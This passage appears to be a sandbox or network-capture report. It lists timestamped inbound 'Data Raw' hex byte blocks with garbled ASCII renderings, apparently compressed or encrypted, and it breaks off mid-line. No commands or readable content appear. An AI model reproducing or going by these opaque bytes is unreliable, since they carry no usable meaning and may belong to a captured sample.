22 00 00 32 71 64 3c Data Ascii: Fk1{.!?)uJEBoW:A5qv0RLMX.Ug0E*9zy~{E">11=(y]=[(pfQ<ku4wFZU4!.BV~4I\|#X-2%U^%_&h2}m"2qd<
2023-10-13 13:21:15 UTC	7678	IN	Data Raw: 70 44 10 84 8e b7 76 ce 8d 9b 45 3d 85 87 8c 73 98 12 23 26 8a c3 1f 9c 9b 54 e2 f9 06 cf 16 c3 1a de dd 56 eb 87 49 fe 90 37 4e e7 e4 1b 5b 1d b4 6e 0f 8e 72 e8 03 50 4e 43 28 e4 47 b3 97 39 fb 6b 96 2f 10 a9 ae aa 93 6e 03 80 80 1f 7c 7f bc d6 e5 74 9d 3e e9 e1 ef cf d2 c6 98 e3 9c c3 a0 8e ed 12 6c 76 27 e9 6e fa a2 4b 70 f1 47 8b 30 ca dc 1f 6c 31 ab 54 d6 f2 6c 9e 49 28 59 8b fa 0b 53 72 62 90 a1 f8 ed f6 4d fe 3f dc 37 1a 4a 24 25 33 8b 07 c6 a8 d3 f2 25 62 0a 4b cc 43 84 05 9a 45 b7 1b 23 8e c9 bb b7 5d b9 51 14 a3 4b c7 62 40 e8 08 79 f8 cb 1a 7e f1 95 e2 27 5b f8 ee 0c a8 9b 18 15 78 91 36 76 18 7b b0 0a 55 e7 39 ec 70 24 ef 48 42 fa 14 3a d8 01 21 5b 95 43 ec 7c 82 e9 00 f9 d8 4f 2e f8 d8 62 b7 ae ef 68 09 f8 5d 04 50 c2 43 dc 23 3c c1 6c 3d a6 Data Ascii: pDvE=s#&TVI7N[nrPNC(G9k/n\|t>lv'nKpG0l1TlI(YSrbM?7J$%3%bKCE#]QKb@y~'[x6v{U9p$HB:![C\|O.bh]PC#<l=
2023-10-13 13:21:15 UTC	7694	IN	Data Raw: 60 4e f7 0e fc f1 45 df 76 ce aa 1e eb 99 a3 4b dc 1a 9d a2 a0 f8 d2 54 af 29 af 6a 14 92 7f ca c3 7c 17 cb 26 3b ae c2 20 a9 a9 ac a0 e1 52 10 fc 10 0e 1d 55 c1 05 9c 48 d0 57 bb e5 bf 52 4b 67 fe 42 ca 4c b6 33 eb 0f fc b1 15 d9 61 e8 18 6a 86 45 bc 55 f7 46 b8 51 8d a6 19 b7 8f 07 68 1c 81 b0 a1 46 39 84 55 12 57 3e f8 fb 38 8b 8a 2c 38 ad d6 e8 38 b2 19 db c5 ac 7c 63 4a b1 f8 b0 f8 2d 94 4c 63 ea ed e5 28 80 68 74 21 67 52 86 2c 17 fd 79 ca 20 21 49 09 e0 48 8c ec 21 f8 06 75 47 3b bf 4c fb de f6 65 67 85 8f fe 71 24 aa d5 e9 b5 33 7b 83 e9 29 36 1e a5 c7 ef bc 2c c4 c6 b7 47 13 03 49 c2 ff cb 8c 67 13 44 76 6b 54 8b 59 cc 7b 79 9a da de 10 c4 e4 b8 2e 37 30 52 93 05 cd e5 ea 91 66 e3 26 55 15 eb 45 1b 35 ca 6f 01 92 38 4e 32 18 19 5b ae f0 a8 48 40 Data Ascii: `NEvKT)j\|&; RUHWRKgBL3ajEUFQhF9UW>8,88\|cJ-Lc(ht!gR,y !IH!uG;Legq$3{)6,GIgDvkTY{y.70Rf&UE5o8N2[H@
2023-10-13 13:21:15 UTC	7710	IN	Data Raw: 7c fc 0c 81 a2 c9 ca dc 16 0f 9f db b5 36 0d ac 12 a7 71 ad 1f 2f 85 54 ba c0 3e e3 b2 6f 49 de 42 20 59 c2 55 9b e2 94 6b dd 64 c9 74 23 b7 8f 83 d1 29 66 0d 2b ed 0d 7f cb 68 96 2c e8 95 4e 62 57 d8 52 ee 36 49 29 3a 33 22 e5 39 67 83 1a 43 91 17 c0 d2 6a 68 ff 5f 04 a0 2e 33 a8 69 07 05 18 81 51 14 3a 8d 8e 45 fb 94 8c 10 0b 88 78 d6 3d 59 11 16 71 22 0c 03 12 08 7a 8e 1c 3e 42 a8 aa 59 05 69 71 96 e6 b0 5e 7e 30 e9 d3 6d 0e c6 b9 02 68 0a cc 69 21 db 7b 2b 94 84 f7 03 59 c4 85 2e 86 3d 4b 2c ff 8b 0a 76 40 95 97 55 71 c0 5c 5e 0c 11 ab 09 13 af 39 61 e3 b8 24 4d 53 c8 44 d0 68 6e a2 e5 f9 0d 55 20 84 23 7f 31 ed 64 13 cd 03 08 cd 0d 61 02 d9 69 34 f0 85 8a a3 60 08 c5 16 79 81 93 fe 70 99 7a ae 2f 8d 2e 3c 2f 62 c5 75 a9 36 89 57 d7 81 86 4c fe fa 0d Data Ascii: \|6q/T>oIB YUkdt#)f+h,NbWR6I):3"9gCjh_.3iQ:Ex=Yq"z>BYiq^~0mhi!{+Y.=K,v@Uq\^9a$MSDhnU #1dai4`ypz/.</bu6WL
2023-10-13 13:21:15 UTC	7726	IN	Data Raw: 4a 5e 9e e0 eb 15 74 45 6a 15 a9 e7 6b f5 00 65 d7 ca 96 23 09 e0 fd 85 6f 1f e6 ee bd a2 cb d9 1e a5 07 65 1d 38 74 df fb 01 c2 6a bb 99 f5 cc a2 e9 68 ae 83 a2 4c 25 df 76 ea ce a6 96 d3 ac 95 41 ca 95 e3 e1 ed 81 58 f6 e5 3a 09 3c ed 13 fb b8 26 f3 c8 95 f6 1c b5 57 b5 5b 93 6b f4 d6 88 fa dc 95 b6 08 22 6e d4 31 d5 51 2b da de fa 24 98 af e1 b5 49 92 58 41 d8 ed 20 a4 7c 80 06 38 bc 22 0e 70 e6 2a e5 6a 74 7f a2 26 9e 56 28 69 74 b5 5f 3e 09 1b 5c 3f ac f4 ed 9c 09 17 59 b4 7d 04 5e 33 23 0d b7 aa c3 72 48 6a d3 40 ad 96 65 5f ab 8a 22 cb c2 28 ab 30 ac 6a 00 c4 8f 6e f0 36 e3 7d f2 88 c4 40 05 c4 7d 40 71 29 17 10 46 4f d9 8b f4 b9 fd ce 5c fd 7f 66 36 7e ba 46 fe 8d 99 1d 5b 44 f1 50 58 d2 4b 1e 6b 5d c0 b6 e5 15 ee 9b 4b aa e8 5c 3a c7 91 a8 3f bf Data Ascii: J^tEjke#oe8tjhL%vAX:<&W[k"n1Q+$IXA \|8"p*jt&V(it_>\?Y}^3#rHj@e_"(0jn6}@}@q)FO\f6~F[DPXKk]K\:?
2023-10-13 13:21:15 UTC	7742	IN	Data Raw: 05 9e f0 6c 0d e6 84 cd b0 cc 29 3d 3c 5d 8d 6b 37 3e 21 25 40 0c e4 a0 b5 c2 bd 9c b6 61 7d ed cf c5 77 e0 ad dd 23 72 0a 53 3d 41 b4 4a 91 23 cc d4 09 fe 89 5f 3b 34 d1 f6 05 0c a0 be 66 26 7a 14 fe a7 ca fb 02 a0 68 fc 71 7d 36 15 15 ba 31 2d 1c ad 36 77 e9 2a 91 07 46 5f 13 e9 6c fc 37 f0 75 5b 37 d4 5f 2e bc 30 17 16 45 48 81 fc 4e 66 26 e0 1d 6a 32 de 0f d9 a8 ff 41 d4 08 95 b8 43 7e 0e 40 42 68 69 e4 41 06 eb 9f d6 c4 e5 37 53 cd 0f d5 4e 12 dc 3c d4 9e 28 76 cb 15 12 c1 6f 11 97 f4 8e ae 9a 64 eb 03 b7 73 60 bd 23 d0 f0 09 7e 8b 14 8e 64 e0 e2 1f d5 90 95 0f 16 f6 0b a2 c7 e0 87 47 a6 1a 78 02 a1 d7 73 d1 d9 aa 3c 34 eb de 63 19 de 61 a5 35 79 b5 ca ca 50 97 5e fb 52 7c 81 67 f1 e2 c6 ca e6 15 c1 6f 43 4c e3 42 63 9d ca 80 48 a6 0c 64 8c f4 bf 27 Data Ascii: l)=<]k7>!%@a}w#rS=AJ#_;4f&zhq}61-6w*F_l7u[7_.0EHNf&j2AC~@BhiA7SN<(vods`#~dGxs<4ca5yP^R\|goCLBcHd'
2023-10-13 13:21:15 UTC	7758	IN	Data Raw: 7d f0 51 b4 c5 5a b0 f8 1e 35 be a7 45 b9 6f 47 8e 7a c2 40 e7 8d c2 29 0d 00 52 5d 6d 80 42 73 27 ab e1 37 3d 34 b7 17 b4 9c 85 6c 2b 72 f9 87 0f e2 7a 6a 27 60 94 c1 ca 73 52 c0 31 5f 49 60 95 d3 df 0a cb 3d a1 2d 9f 8a 9c 1c 2f a1 65 ed 6f 25 7d 85 12 78 84 f4 81 df 23 31 4e 9f 35 28 18 4d c8 8a 24 22 37 56 a5 52 8f 6f 18 83 69 e4 17 4b 9f ac 75 6e 34 7d 87 ab 7f 44 21 f4 7a 6b ad d5 72 8d 32 66 fd 43 77 25 e4 99 57 5d f6 76 9c 14 67 32 f9 3b 4e 18 8d 11 12 57 e6 34 87 3b a1 c3 c7 05 dd d8 a1 54 c6 32 f4 0c 18 ca 69 50 27 49 3a 96 d5 62 59 4c a6 5a 39 e2 18 4f c2 39 86 10 98 67 b3 44 b4 58 78 e2 10 22 ea 37 47 a3 20 a2 d0 30 8f 5e e6 7d 02 f4 0d 37 8d ff 53 aa d7 e5 09 ce de 52 6f e4 a3 5e 5f 8c 8b bb 7f c0 5a b9 ac e8 bd 10 2d f0 fe 10 ca 7b 0d c6 98 Data Ascii: }QZ5EoGz@)R]mBs'7=4l+rzj'`sR1_I`=-/eo%}x#1N5(M$"7VRoiKun4}D!zkr2fCw%W]vg2;NW4;T2iP'I:bYLZ9O9gDXx"7G 0^}7SRo^_Z-{
2023-10-13 13:21:15 UTC	7774	IN	Data Raw: 9b 46 ec 7f 47 20 7d 73 86 dd d5 a6 2b 21 63 8e 22 80 e3 02 2c 60 3b fc ae ef e1 c7 00 a5 85 24 fd 3c 4b 1c 93 a4 ec 50 8c 83 2b 4d 60 49 68 0c 2d 6c e6 62 13 fa 56 a4 f5 47 c1 90 1a 15 41 17 81 43 c3 29 6a b4 ce 5e f1 80 c0 fb 51 a6 fa 1f e9 dd f4 a0 d0 12 34 92 a2 bd 6e bb f5 7d 2d 3b fe 48 83 8c 5f 38 5e 69 e1 58 08 15 23 40 03 ed d2 1b 7c 67 c8 50 eb bb e8 e5 9c 2c 85 b1 b5 38 1e 3d 6c 45 2f d2 ad 73 df 02 e6 ab ef 3e 04 27 a8 7b 47 e5 52 cd 4b 92 e0 4f 62 13 e9 3b 65 c3 cf 62 b8 05 53 e4 3d 1a b6 9a ec 28 8e 4d f8 57 34 27 db 28 54 59 82 4b 1f 39 d3 b5 30 1b 00 e7 d4 25 3c 20 53 bc 3e d6 da 6c 67 51 a8 21 ef e6 c2 67 e1 d9 9f 58 47 81 aa f0 ab d9 36 f1 61 6e 29 70 cc cf 69 a0 fb 98 c7 ef bb ff 8b 2e 4b fa 7c 2a 69 51 e1 d7 f7 04 57 f7 ee 65 d6 f5 41 Data Ascii: FG }s+!c",`;$<KP+M`Ih-lbVGAC)j^Q4n}-;H_8^iX#@\|gP,8=lE/s>'{GRKOb;ebS=(MW4'(TYK90%< S>lgQ!gXG6an)pi.K\|*iQWeA
2023-10-13 13:21:15 UTC	7790	IN	Data Raw: 3d ad e7 08 2a c0 ad e1 18 5f 0a 44 df fa ab e8 0b 0f 91 34 d4 62 20 f3 fe bb b8 ae d6 60 60 44 31 63 a4 aa 83 b2 cc 7b 70 27 e6 11 fa e9 80 a2 d7 dc ab 75 a6 33 16 c4 71 96 bb 78 7d bf 5e 1f f7 34 d8 ac fe 1a 2b 24 28 ae 94 54 5a 82 0e 31 98 aa 2f 09 db 05 9b 4d 50 75 d6 01 eb 65 39 d9 d2 67 be c4 ac 3d f4 f8 79 d7 90 57 92 65 70 c4 7f 55 e8 ca 9f fb f7 7b 64 cc eb 25 a7 fd fc f8 ff f5 79 59 cf 0d ec 8a 32 f4 79 52 77 40 58 f0 be d8 b7 8d ff 58 22 9f ff 64 5b 99 1f f3 5a 91 a6 7e ff 72 f1 1b 34 5d 11 62 9a 42 dd 26 ca 36 88 20 0d 86 75 f5 11 f4 fe f4 4e 67 8f 71 e1 4f 76 1c f8 af 32 c2 4a 78 e9 34 90 19 1a 84 85 e0 11 e7 9f b4 78 4a 23 d8 16 de 83 c9 f8 b1 9c 1f a1 37 ac 72 bb 57 a0 e5 11 25 46 8b c4 10 07 0d cf f1 7a ea 5b ec 68 79 6e b3 ee aa 2c 2d 8c Data Ascii: =*_D4b ``D1c{p'u3qx}^4+$(TZ1/MPue9g=yWepU{d%yY2yRw@XX"d[Z~r4]bB&6 uNgqOv2Jx4xJ#7rW%Fz[hyn,-
2023-10-13 13:21:15 UTC	7806	IN	Data Raw: 0d 90 ca 57 11 de 9a 60 c3 5d 3d ad 1f 01 d0 c0 53 d6 6c 08 f8 66 d0 f4 d9 94 db d1 34 c2 55 34 99 56 0a fe f2 9b c2 85 2d 36 e9 d8 a4 33 e5 e3 01 1d e3 46 ff 30 eb a2 fb e3 a6 8e a0 6c ad 2d e5 7f 1b 8e 22 c2 e6 39 21 08 af 3b 46 26 f7 c0 01 51 4c b3 f1 bd b3 3d 89 36 51 fe 62 89 bc 6a c2 58 12 9d 03 10 70 6f a6 5b 48 0e 05 72 c1 81 5b 81 42 78 cb b8 1e 4a ea c2 99 b6 e7 16 26 9b e8 2a 4c 11 2a 32 d1 74 80 ba cf 68 8c 79 1b c5 56 57 ab 44 3c 43 f1 e9 02 b9 88 c3 ab 87 0d fe 25 a4 0d b3 dd f2 cd 1b 0a b7 92 39 bf 52 2f 3c ed 33 ef 2a 68 56 04 33 2a 70 d4 7b c1 97 18 cb d3 a9 04 81 22 dd 5f b3 1d 3c cd d4 a0 cb 25 7c 4b 32 cc f3 46 b4 59 ad 85 21 79 ef aa 08 8c 9a 35 ec 8c c6 0f d0 bf 97 fe 55 97 cd 10 85 47 36 b5 90 74 c2 a4 51 cc cb 8a 74 02 88 73 d7 e5 Data Ascii: W`]=Slf4U4V-63F0l-"9!;F&QL=6QbjXpo[Hr[BxJ&L2thyVWD<C%9R/<3hV3p{"_<%\|K2FY!y5UG6tQts
2023-10-13 13:21:15 UTC	7822	IN	Data Raw: 44 21 60 59 5a 02 b8 be e9 f8 09 0e 4f 1f 97 ca a9 a8 ff 7f 5e 17 63 96 7b d7 b6 7b 87 bc f4 3b ef 42 e5 f2 ec 20 a0 4a ac c1 0f 35 e4 97 b9 cf 21 d5 18 e8 c3 31 04 09 8f 98 93 e1 73 d1 b3 2d be d2 0a e7 0a 9d 43 09 73 43 18 32 d8 10 f9 fa 89 17 ab fd 05 64 f1 f6 20 b4 f4 58 ca 05 6b a2 10 6d 63 1d 7e d4 b4 43 82 38 89 94 df 45 29 87 bf 01 94 0a d0 ae 53 fb da 1d e8 9e 9f dc 3b fc 40 f1 35 a5 f8 b1 c4 fd 75 2f 4c d3 e5 72 95 28 73 d9 35 a6 96 09 00 ea d4 a8 63 a6 be 03 0f 52 dd 71 a1 b8 bd 0f cd 58 0a 99 42 0a 0f 2a 10 95 21 42 08 8b 49 dc 8c be 52 01 36 19 b0 f8 83 7a aa cb 1f 52 8f 67 ac 01 12 43 2c e6 1f 18 9c 7d 93 01 3c 07 e6 1c f4 3b c5 cf 84 3a b7 3e ba 8e 14 6c 68 1f ba 57 ab 85 21 33 dc 8a 40 44 48 37 ff 79 d3 d5 16 54 9c c9 8d a1 c7 1a 02 b2 15 Data Ascii: D!`YZO^c{{;B J5!1s-CsC2d Xkmc~C8E)S;@5u/Lr(s5cRqXB*!BIR6zRgC,}<;:>lhW!3@DH7yT
2023-10-13 13:21:15 UTC	7838	IN	Data Raw: 3e 35 98 e3 16 52 b1 ad 0f 68 c9 55 4a e6 9d c6 40 11 af aa d6 9d 6e 35 2e b7 b2 6e d6 08 92 8a e6 43 89 8c 31 7d 43 49 19 ae dc b0 be d1 ba c9 04 aa 1d 79 0f 6e c5 d7 19 39 22 f7 32 14 bf fb 2e 5b b0 31 66 24 2f 93 da ac 32 a6 bc a1 dd 78 4e c9 75 49 2f 00 a6 a5 7b ad de df d1 7c 30 d3 0c ac 7f 65 a3 a4 ee f9 bc da 59 da 5f e2 1b 39 28 84 ce f2 9a de 85 3a 3a 6a d4 0a ed 81 90 69 84 31 15 f4 c6 04 37 b4 16 67 d7 73 32 bb aa e0 22 4d b1 cc 67 6b ab c0 61 f3 75 c9 00 1a 01 40 1e 5b 0d b3 5e a6 19 ee ca c5 41 47 56 dd 18 22 87 f7 3e 6a 4c 88 8e 6f 0e d9 3b 65 00 65 6f eb 2d 7c 9a 3a 62 de fd db a3 d0 ee 4f 1c 05 9e 4a 30 c5 c6 71 cd 4a 8b 44 02 11 8f cc 1e d8 e1 4b 75 18 42 d3 c3 fb 01 cd 33 2b 66 6d 4d 0d 60 c7 2c b2 6d c0 3a 7e 28 0b 49 a2 5b cb dc 49 93 Data Ascii: >5RhUJ@n5.nC1}CIyn9"2.[1f$/2xNuI/{\|0eY_9(::ji17gs2"Mgkau@[^AGV">jLo;eeo-\|:bOJ0qJDKuB3+fmM`,m:~(I[I
2023-10-13 13:21:15 UTC	7854	IN	Data Raw: ff 63 98 9e 21 51 cc 1a c4 88 70 23 65 e6 8d 34 a6 f5 73 31 cf d2 e7 02 b9 8f 47 b0 d1 8c c3 68 56 20 22 25 38 a4 9b 7a 19 e0 d8 72 62 a0 47 a2 98 0c f9 58 7f f2 ac e2 2e ae 38 0b 01 12 aa f3 e2 d5 c3 5a b9 5b 88 93 49 c1 41 a5 51 f2 83 fb 18 3d 2f 78 13 9f a8 42 aa 11 48 a0 0e e7 d0 45 b1 06 75 d6 12 7c 46 2a cf 43 3e 63 e7 51 ef 49 22 5b 5c 2a d9 d3 45 15 be c9 43 3a fe 35 04 3e fd 27 59 41 d2 7f c0 5c ce 7a a2 15 c2 87 d1 e2 11 92 cc 6d 66 30 5c 45 63 ec d9 33 79 c7 f2 49 78 43 38 00 a1 96 e4 31 b3 d3 d3 57 0f ee 22 18 25 9e 53 17 a0 de f0 65 a3 17 3e 01 a2 2b bf 57 4b 42 b5 55 a0 87 d1 d3 17 df 13 9e 10 1e 53 b3 4b 01 e6 4e 9e 39 b8 6d e1 df ff 52 fd ec 3b 0f 46 00 fd 92 f3 61 3e e8 40 a8 f3 df 66 2a 8b b8 6d 0b 51 bb cb 94 61 97 eb ac 18 52 29 3a 1e Data Ascii: c!Qp#e4s1GhV "%8zrbGX.8Z[IAQ=/xBHEu\|FC>cQI"[\EC:5>'YA\zmf0\Ec3yIxC81W"%Se>+WKBUSKN9mR;Fa>@f*mQaR):
2023-10-13 13:21:15 UTC	7870	IN	Data Raw: 16 ed b4 df f3 6a 7b 25 f5 ee a4 51 cb 32 5c dd 67 5f c8 32 55 9f 86 e9 d9 f4 af db f0 fb f6 75 46 63 44 36 32 9e 9b 47 42 4d 78 25 11 22 c5 1c 5d 07 4c 68 bf df f0 31 c3 16 b7 35 a7 91 d1 b9 ea 5c 37 62 b7 09 a5 11 8a 51 da 6d 59 e9 61 54 86 28 5d 69 10 98 82 5b e6 a1 5d b3 cc 9b 16 20 64 d1 3c f4 cc 1b 8c 48 3d 15 17 61 e8 9d 8b bc b2 09 b0 19 32 cc 68 f5 d0 29 6f dc 88 0a 54 40 5d 00 63 ba 9f 3e 15 cf 72 0e 1a 64 ab 8c db 85 e0 b3 d8 ff 30 41 40 f3 61 57 6b a6 8a 60 66 c1 de a8 f4 48 9b ae 9a 2c c3 f1 ca 46 53 b9 c1 5a 3d cb d3 37 ad 63 f6 3c ee c7 eb e8 cd 37 af c8 56 88 f2 e6 9b 40 d4 25 8f 0c 06 83 f2 11 3e 8b 26 74 53 29 5c c2 23 f1 12 f3 dd 26 70 0c 54 84 56 1c 96 35 b4 93 af 19 68 c1 02 51 35 34 19 f6 7b 61 18 93 7e 8e 1a 75 bd 33 e5 2c 6c 2e 68 Data Ascii: j{%Q2\g_2UuFcD62GBMx%"]Lh15\7bQmYaT(]i[] d<H=a2h)oT@]c>rd0A@aWk`fH,FSZ=7c<7V@%>&tS)\#&pTV5hQ54{a~u3,l.h
2023-10-13 13:21:15 UTC	7886	IN	Data Raw: 76 31 93 85 80 57 b5 c8 79 1a e4 6c a6 97 85 50 33 e0 65 5c e0 1e ef 85 15 63 45 32 59 85 1f 26 b7 ac 65 b6 c9 80 41 f7 cb 9e 53 8b a9 a0 93 93 d7 e1 c4 c1 3f 2f 9b 1e 58 47 b0 20 4f a3 65 79 2c 02 d6 e6 70 97 e1 f2 44 77 b8 03 dd 5f cc fd 37 e2 c1 c7 6d a4 7b b7 17 e7 a7 e2 ce 18 70 4f b5 28 75 fe 0f f8 4a 67 29 9a 6a 52 9f f3 6c 3d 35 5e 28 d5 4a 05 7d b8 d0 f4 4d 7e 90 56 d3 70 0a 2a c3 f1 d6 19 e5 c4 d7 f6 40 5e 72 ce b6 ab 60 53 d3 c0 ed b2 f0 ce f0 73 8c 8d f5 ab 52 fe 99 2c 7d 90 c5 75 75 7c 61 a9 8c 31 9c 75 74 27 ce 36 49 5e 3d 70 c6 08 bc 02 7b 81 ad 84 b9 79 3c 87 4a f7 82 e6 41 8c 5c c3 23 90 5e c0 8b 08 11 e6 77 44 14 93 ea 45 e9 4f bb 33 f4 6d dd c5 e3 43 10 8b 3d a6 3d 4e 47 dd 35 85 78 11 46 45 34 40 08 57 2c ea ed f0 ec a2 64 bd 2c 61 1a Data Ascii: v1WylP3e\cE2Y&eAS?/XG Oey,pDw_7m{pO(uJg)jRl=5^(J}M~Vp*@^r`SsR,}uu\|a1ut'6I^=p{y<JA\#^wDEO3mC==NG5xFE4@W,d,a
2023-10-13 13:21:15 UTC	7902	IN	Data Raw: 09 8b 53 f9 94 fb c7 5f 87 10 4d d0 a3 ca 9b fd 10 6b 1b 50 a1 13 f4 e2 ee 53 59 20 77 62 13 74 17 17 40 70 e8 02 a9 2d e9 9b 8a 7e 61 03 1f cb 3a 46 30 7b e3 af 1e c3 56 6f 99 94 f3 10 61 d2 39 94 63 63 34 8e 13 50 0e 8b b3 8f a4 27 6d 5e 4e cc 10 15 1d 14 37 e9 5f dc 2c 76 b9 35 e8 a6 ef 7a 54 63 11 9c ac 3b 55 78 35 4e 88 5f ba a4 12 55 4a 87 f6 38 dc 0a 2e 82 22 3b 0e 15 76 82 ec 8a bf 03 f5 93 74 aa 8c 9e 4a cf c6 bf ed f5 9c 11 a1 0a ad 69 c2 d2 e3 33 93 7b 65 8d 49 91 63 19 52 df fb 11 a1 74 90 a7 73 eb 43 4a d9 8e 3a c5 59 36 c9 51 cc 40 b9 df 4a aa b5 a2 b6 b5 0a ff 14 40 f3 b1 cf c4 9c d8 86 67 23 2d 15 cc a8 cc e2 22 f2 37 a8 af 12 74 61 90 99 90 cd a3 b4 b7 3d 51 62 b8 39 7f c8 e6 eb 67 34 eb 25 be a1 a4 46 b1 4b ed ad fb a5 63 e4 b9 5c 3b 56 Data Ascii: S_MkPSY wbt@p-~a:F0{Voa9cc4P'm^N7_,v5zTc;Ux5N_UJ8.";vtJi3{eIcRtsCJ:Y6Q@J@g#-"7ta=Qb9g4%FKc\;V
2023-10-13 13:21:15 UTC	7918	IN	Data Raw: d3 08 b8 30 1d 4e 95 40 4d 4d 03 5c af e6 00 cc 2f 59 a9 7e d3 d7 7a be 17 22 a9 fb 3a 55 61 a6 69 1d 9a 0a cf 13 fa 89 04 9e d3 47 f9 fd 0c 41 d0 fb 08 2e e6 ce 3a 33 d6 8c 99 61 5e db a3 d9 ab 3b 2b 17 33 62 06 4d be 90 df a0 49 92 60 6a b6 b0 f6 9a 91 c0 7c a3 6b fc 0d f7 8c 4c 93 86 a4 ef 9c be 11 aa 3e c0 48 ff 55 3f 5c f9 34 db 79 14 e1 df 63 7d f5 89 fd 1b 8d 3d 2b ea 36 5b 28 0c 96 55 7a c3 90 37 12 7f 02 ba 5b e5 4a 01 6c 92 d7 5b e4 9a 96 67 7d 2a cc 86 49 85 42 52 a7 5c ab 9a a4 2c 25 bf f0 0e 8c 09 ba 56 74 8f 13 f3 b6 16 87 46 ba e1 b8 bf 62 9f e4 30 80 2a 77 08 f9 24 77 c4 fc d8 80 a0 ea b7 d3 2e ce 79 20 97 4e ce cc 4d 8f 0e f6 38 ba 3c 2d d9 a5 6f 8f 84 c0 f8 0f 8b dc 00 aa 93 ae e5 bd ee d5 1a 8f 17 6b c4 fb ee e2 bc 0a e0 53 51 70 cb df Data Ascii: 0N@MM\/Y~z":UaiGA.:3a^;+3bMI`j\|kL>HU?\4yc}=+6[(Uz7[Jl[g}IBR\,%VtFb0w$w.y NM8<-okSQp
2023-10-13 13:21:15 UTC	7934	IN	Data Raw: 69 4a 92 1e 8a 84 ba e6 61 42 49 ba c5 41 e0 96 f7 cc 4c 64 32 2f 96 6e 55 f5 b5 cd ee ed 69 c8 f1 49 08 25 0a 5c 46 29 06 1e 7e a5 92 31 d1 06 74 4e 88 48 20 82 f9 90 c4 d4 d6 2f 78 c0 57 68 21 82 04 4d cb b3 e2 dc 77 e9 ca 3e 8e 6e 34 57 77 29 26 8b 4d ef 58 52 ea 01 f9 49 bc 78 22 84 b7 ce d8 42 3b b6 a6 74 35 85 ed 01 45 2d a2 7f ea 49 55 6d 0e 86 ad d0 95 26 cd 5f a9 b1 6c 7b 0f 18 45 72 da d0 c9 51 fd bb e7 13 93 ab 23 d0 b8 ab b9 ec 9c b9 d8 66 1e 5f fd 5d cf 92 1b 8a c6 2c a5 78 60 55 79 50 51 1f b1 ac 42 8d 6b a2 ac 0b e3 2b 17 8d 35 c9 d8 68 69 6c c5 dc 21 f2 2b 60 ff a3 be 37 17 5f 67 78 0a a3 91 b7 b8 a6 46 2b e6 7d cf 23 29 f4 d6 ef e6 b2 bd 76 0c 29 28 79 18 94 69 09 39 4d 13 96 f9 e8 06 c6 7e ec 97 d6 09 22 a4 4f 3c 33 1f ec f7 d4 2d f1 39 Data Ascii: iJaBIALd2/nUiI%\F)~1tNH /xWh!Mw>n4Ww)&MXRIx"B;t5E-IUm&_l{ErQ#f_],x`UyPQBk+5hil!+`7_gxF+}#)v)(yi9M~"O<3-9
2023-10-13 13:21:15 UTC	7950	IN	Data Raw: 0a 6c 01 d6 91 fc eb 0e de a3 ac 6e 6c 9c 36 2a 13 c9 30 e9 ea 81 f1 0d 9f 1b 4a f9 51 91 c1 bf b8 bf e7 23 d1 d3 f1 80 18 65 e5 5e 5f 0d d4 b6 7d bc 3b a8 82 d7 53 df bc bf 43 6d 7b 96 3a 3a cc 9d 44 bb 20 a5 8c f9 55 07 68 a8 3d 11 fd 3a 15 e7 ea 13 78 dd e7 13 b7 c0 cf 08 7c 28 40 a4 f6 e1 90 30 c8 d0 70 ce be e0 2e 4b 4e 95 41 3c eb b9 c9 50 a9 9f 3d b9 4c c8 32 08 30 71 16 bf fd 4c 2b f4 9e 5d 2e a7 de bc 83 32 82 41 62 cf 2d e0 97 78 65 95 c4 3f 27 57 de d3 ba 36 4c 32 0f c0 ce cf 73 a8 f6 12 bf 23 3f 4a c7 50 f9 91 6e 55 ac 2b b0 84 36 ef 08 53 74 d0 4d f4 09 94 a2 88 fa 28 cb 45 c1 42 8f dd 2f ac 72 59 f3 60 4f 94 25 99 74 06 7e 0b 9c c2 f4 14 3a 51 b2 e2 47 50 34 b9 d3 5c a6 56 d1 11 71 21 1e df 4f 86 55 1c 8f 74 9e 55 46 ba 91 61 65 c7 73 40 d0 Data Ascii: lnl6*0JQ#e^_};SCm{::D Uh=:x\|(@0p.KNA<P=L20qL+].2Ab-xe?'W6L2s#?JPnU+6StM(EB/rY`O%t~:QGP4\Vq!OUtUFaes@
2023-10-13 13:21:15 UTC	7966	IN	Data Raw: 50 d3 4e f0 d6 03 46 0e 4b d3 52 1f 81 21 3f 5c 0c 16 96 9d 97 fd 52 c0 93 e7 41 45 16 07 68 e6 91 e2 d8 6d 67 18 0d 0e 34 d3 27 36 80 fc 24 5d 87 ca 12 7d d4 06 c2 22 ee 61 7c db 82 21 82 a1 20 22 a2 3d 0c 01 e3 9c d8 0b dc ec ef 3a b9 f4 89 da e8 53 ff 11 87 ef f2 95 ee 9d 70 41 12 1c 40 d7 93 79 6c 43 a1 eb 4c d2 1e d6 c7 c7 36 c0 63 b8 26 95 07 58 28 d0 5e c1 08 f2 ee 3b 46 29 b6 9a 56 4d c1 dc 73 64 91 89 23 73 d7 e7 fc ef 7b 3d 75 df b8 aa 37 af bf 20 38 a1 3c 02 74 b4 3e e7 b3 d6 60 19 53 e9 4a 03 06 7e 99 66 a5 a6 c1 34 90 7e 96 0a ae de 62 dc 23 c7 70 6e 0b d0 93 60 e2 9c 73 31 b1 2c 8c f1 35 e3 af 37 a9 6b 49 8d 0e b8 86 2e fd 26 24 5c c9 4e 40 8a 95 60 bf 47 c1 1a 11 90 ac ec 41 0a 4a ba 59 8d 5a 2f c3 f9 60 db d4 f8 45 30 17 24 9a 8a 29 b7 46 Data Ascii: PNFKR!?\RAEhmg4'6$]}"a\|! "=:SpA@ylCL6c&X(^;F)VMsd#s{=u7 8<t>`SJ~f4~b#pn`s1,57kI.&$\N@`GAJYZ/`E0$)F
2023-10-13 13:21:15 UTC	7982	IN	Data Raw: 15 fc f3 d0 69 04 e0 11 3b 21 58 5d 5e de 9c 4d 59 d4 d0 8a 29 8e eb bf 6c fe 6b 04 3e c4 b5 6e d2 c9 91 c0 52 26 cb 0e 0a 8f 3d 4a 52 58 a7 ab 49 67 76 ec fd a0 d7 70 8b 8d c9 47 fe 55 60 aa 59 52 4f 2e 98 92 65 35 d7 f1 eb d5 d6 96 2a f7 59 79 33 28 18 4e 9c ac 03 dc 25 ef e4 34 59 16 c7 b9 36 c5 4b bf fc 54 f3 d3 6f b7 59 8c 63 9a a0 1e d7 8c 4e 8a a5 d4 18 5b 71 66 d5 6e e0 49 56 87 04 21 5d 24 30 b9 e0 52 35 30 0a b0 d5 ed 37 28 64 86 3c eb 13 32 83 b4 e9 df 66 bd 7d 0f 7a 67 bd f3 1a 33 6a 62 2a 40 a9 c7 f7 c8 9d 98 cc 7e f7 a1 